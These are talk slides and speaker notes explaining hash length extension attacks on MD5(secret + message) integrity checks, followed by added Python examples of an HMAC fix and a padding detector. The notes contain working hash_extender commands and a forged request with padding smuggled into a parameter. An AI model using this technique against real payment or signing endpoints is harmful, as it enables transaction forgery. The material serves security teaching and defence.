Hash Length Extension Attacks
Jerome Smith
CamSec April 2017
Introduction
• An application uses this scheme as an integrity check:
hash($secret + $message)
// where + denotes concatenation
• Whenever the message is potentially subject to interference, the hash is sent alongside
• The theory goes that any message tampering will be detected
• But this is potentially vulnerable to a “hash length extension attack”
• Secret prefix
• Attacker knows message and hash
• Vulnerable algorithm, e.g. MD5, SHA-1, SHA-256, SHA-512 (not SHA-384)
• Thanks to Soroush Dalili @irsdl
What makes a hash vulnerable?
• The hash algorithm chews on the input
• At the end, the internal state of the hash algorithm is the hash it spits out
• We can set the internal state of the hash algorithm to start from this point
• We can then feed in more input
• We now have a hash for a longer message that starts with the original input
• It doesn’t matter if the input began with a secret, we don’t need to know it
Exploitation
• Sounds great, doesn’t it?
POST /transfer HTTP/1.1
account_from=10203040&account_to=90807060&amount=100&hash=AABBCC112233
// where hash = MD5("SECERET1020304090807060100")
• So we set our MD5 state to AABBCC112233, feed in a 0 and get a new hash
• This will “validate”:
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
// where hash = MD5("SECERET10203040908070601000")
• Unfortunately it’s not that simple
Deep dive
• MD5 is a block-based algorithm
• Padding is used to prepare the input before it’s digested
• Different algorithms use different schemes
• Take a message M
• The input that MD5 works on is:
M + PADDING + LENGTH_OF_M
• This will be some whole number of blocks in length
• What does that mean for our attack?
What’s really going on
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
• We’d like hash = MD5("SECERET10203040908070601000")
• When we run our hash length extension attack, the input to the hash is really:
"SECERET1020304090807060100" + PADDING + LENGTH + "0" + PADDING + LENGTH
• The “message” we have a valid hash for is:
"SECERET1020304090807060100" + PADDING + LENGTH + "0"
• The app is checking hash($secret + $account_from + $account_to + $amount)
• We need to preserve account_from=10203040&account_to=90807060
• So that leaves amount="100" + PADDING + LENGTH + "0"
• The first PADDING + LENGTH was originally “metadata”: it’s now part of the data
• The crafted input isn’t tolerated in context
Demo
• That’s not to say it can never work
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd740683e182f0
// where hash = MD5($secret + $seller_id + $reference + $amount)
//            = MD5($secret + "1234widget145.20")
//            = MD5($secret + "1234widget145.20" + PADDING + LENGTH)
• So what about
seller_id=1234&reference=widget145.20PADDINGLENGTH&amount=0.99&hash=398e6d69a7fdf27744bd55cfdfc9fdb4
// where hash = MD5($secret + "1234widget145.20" + PADDING + LENGTH + "0.99")
• This will work if the app accepts the weird reference value
• https://github.com/iagox86/hash_extender
./hash_extender --data 1234widget145.20 --secret-min 8 --secret-max 12 --append 0.99 --signature 75b145717ad82cfefdcd740683e182f0 --format md5
Final Thoughts
• Not always exploitable – but when it is, impact can be high
• Tricky to find in a pure black box test
• If the hash scheme used a delimiter, the attack would still work
• Just makes it harder to find – need to know delimiter as well
• But it would stop a simpler attack:
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd740683e182f0
seller_id=1234&reference=widget1&amount=45.20&hash=75b145717ad82cfefdcd740683e182f0
• Secret suffix is vulnerable due to collisions
• https://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/
• We’ve already solved the MAC problem
• “Length Extension Attacks” Burp App – not tested
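The corrected scheme, as an added example that is not from the original slides: the delimiter-less MD5($secret + fields) check beside an HMAC-SHA256 check over length-prefixed fields, run against the widget / widget1 pair above. The function names, the field encoding and the demo key are assumptions made for illustration.

```python
import hashlib
import hmac
import struct

SECRET = b"constructed-demo-key"  # constructed value, not the application's secret


def weak_tag(secret: bytes, seller_id: str, reference: str, amount: str) -> str:
    """Scheme from the slides: MD5(secret + fields), plain concatenation."""
    return hashlib.md5(secret + (seller_id + reference + amount).encode()).hexdigest()


def weak_verify(secret: bytes, seller_id: str, reference: str, amount: str, tag: str) -> bool:
    return weak_tag(secret, seller_id, reference, amount) == tag


def encode_fields(*fields: str) -> bytes:
    """Unambiguous encoding: field count, then each field behind a 4-byte length."""
    out = struct.pack(">I", len(fields))
    for field in fields:
        raw = field.encode()
        out += struct.pack(">I", len(raw)) + raw
    return out


def strong_tag(secret: bytes, seller_id: str, reference: str, amount: str) -> str:
    """HMAC-SHA256 over the encoded fields. HMAC's outer hash pass means the
    tag is not a resumable internal state, so it cannot be length-extended."""
    msg = encode_fields(seller_id, reference, amount)
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def strong_verify(secret: bytes, seller_id: str, reference: str, amount: str, tag: str) -> bool:
    expected = strong_tag(secret, seller_id, reference, amount)
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode(), tag.encode())


def demo() -> dict:
    original = ("1234", "widget", "145.20")
    shifted = ("1234", "widget1", "45.20")  # same bytes once concatenated
    weak = weak_tag(SECRET, *original)
    strong = strong_tag(SECRET, *original)
    return {
        "weak_accepts_shifted": weak_verify(SECRET, *shifted, weak),
        "strong_accepts_original": strong_verify(SECRET, *original, strong),
        "strong_accepts_shifted": strong_verify(SECRET, *shifted, strong),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```
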
Questions?


Editor's Notes

  1. For MD5:
     PADDING is 0x80 plus null bytes
     LENGTH is bits in a little-endian 8-byte field
  2. PADDING and LENGTH not necessarily printable bytes and make no sense in context of app
  3. Output of hash_extender is ASCII hex of $data + PADDING + LENGTH + $append
     PADDING starts 0x800000…
     LENGTH is length($secret + $data) in bits (“SUPERSECRET1234widget145.20” = 27 bytes = 216 bits = 0xD8)
     Need “data” parameter so it knows how much PADDING and LENGTH to tack on (technically could just be a number but output includes that data)
     Output differs with length of secret as longer secret -> shorter padding and shorter length, but “new signature” i.e. new hash same as we’re winding on the hash from the same start point (the given hash) with the same data appended
  4. Delimiter stops parameter manipulation when concatenation used
     Doesn’t stop hash length extension if delimiter known…
     ----------------------------------------
     /hash/pay-delim.php
     seller_id=1234&reference=widget&amount=145.20&hash=f9243d9e5b806d8bb3e5746024f6c124
     App is calculating: MD5($secret + ":1234:widget:145.20")
     Of course actually it’s calculating: MD5($secret + ":1234:widget:145.20" + PADDING + LENGTH)
     ./hash_extender --data :1234:widget:145.20 --secret-min 8 --secret-max 12 --append :0.99 --signature f9243d9e5b806d8bb3e5746024f6c124 --format md5
     seller_id=1234&reference=widget:145.20%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f0%00%00%00%00%00%00%00&amount=0.99&hash=05c695020d4e3bba16071d6c8b514b3a
     App calculates MD5($secret + ":1234:widget:145.20" + PADDING + LENGTH + ":0.99")
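
A defensive check built on the notes above, as an added example that is not part of the original slides or of hash_extender: it rebuilds MD5's PADDING + LENGTH and scans a decoded request parameter for that byte pattern, which has no business inside a reference field. The function names are hypothetical, and the sample value is constructed from the delimiter example assuming the 11-byte secret length implied by note 3.

```python
import struct
from urllib.parse import quote, unquote_to_bytes

BLOCK = 64  # MD5 block size in bytes


def md5_padding(msg_len: int) -> bytes:
    """PADDING + LENGTH that MD5 appends to a msg_len-byte message."""
    zeros = (55 - msg_len) % BLOCK   # fill so the 8-byte LENGTH ends a block
    bits = (msg_len * 8) % 2**64     # LENGTH counts bits, not bytes
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", bits)


def find_glue(value: bytes) -> list:
    """Locate MD5 PADDING + LENGTH runs embedded in a decoded field value."""
    hits = []
    for offset, byte in enumerate(value):
        if byte != 0x80:
            continue
        # LENGTH may itself begin with zero bytes, so try every split point
        # between the null padding and the 8-byte length field.
        for zeros in range(BLOCK):
            end = offset + 1 + zeros + 8
            if end > len(value):
                break
            (bits,) = struct.unpack("<Q", value[end - 8:end])
            hashed_len, rem = divmod(bits, 8)
            # The field's own bytes before 0x80 were part of the hashed message,
            # so a genuine LENGTH cannot describe fewer bytes than that.
            if (rem == 0 and hashed_len >= offset
                    and value[offset:end] == md5_padding(hashed_len)):
                hits.append({
                    "offset": offset,            # where 0x80 sits in the field
                    "hashed_len": hashed_len,    # bytes hashed before the padding
                    # bytes hashed ahead of this field: secret plus earlier fields
                    "hidden_prefix_len": hashed_len - offset,
                })
    return hits


def scan_param(raw: str) -> list:
    """Percent-decode a raw parameter value, then look for embedded padding."""
    return find_glue(unquote_to_bytes(raw))


# Constructed sample mirroring the delimiter example in note 4:
# an 11-byte secret followed by ":1234:widget:145.20" is 30 bytes = 240 bits = 0xF0.
SECRET_LEN = 11
DATA = b":1234:widget:145.20"
SAMPLE_REFERENCE = quote(
    b"widget:145.20" + md5_padding(SECRET_LEN + len(DATA)), safe=":."
)

if __name__ == "__main__":
    print(SAMPLE_REFERENCE)
    print(scan_param(SAMPLE_REFERENCE))
    print(scan_param("widget"))
```

The check covers MD5's layout only; SHA-1 and SHA-2 store LENGTH big-endian, so each algorithm needs its own pattern.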